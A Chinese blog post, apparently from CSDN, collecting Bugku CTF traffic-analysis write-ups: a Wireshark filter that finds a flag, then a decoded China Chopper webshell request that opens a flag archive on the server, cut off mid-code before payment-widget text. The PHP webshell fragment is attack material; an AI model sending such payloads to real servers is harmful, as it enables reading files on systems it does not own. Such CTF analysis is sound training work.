bugku流量分析题汇总

当你的才华撑不起你的野心的时候,那就好好学习吧!

为了更好的巩固最近学习的流量分析,决定找几个靶场来练练,就拿bugku开始吧!

flag被盗

在这里插入图片描述这个比较简单
直接使用过滤器:http contains "flag"
出现了两个流量包,跟踪tcp流,
然后就能找到flag
在这里插入图片描述flag为:flag{This_is_a_f10g}

中国菜刀

在这里插入图片描述想着要用菜刀,一般要用一句话木马,使用“http”过滤了一下
在这里插入图片描述一个一个包去看,将里面的内容进行base64解密,直到发现了下面这个包
在这里插入图片描述

@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<'5.3.0')
{
   
@set_magic_quotes_runtime(0);
};
echo("X@Y");
$F="C:\\wwwroot\\flag.tar.gz";
$fp=@fopen($F,'r')
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值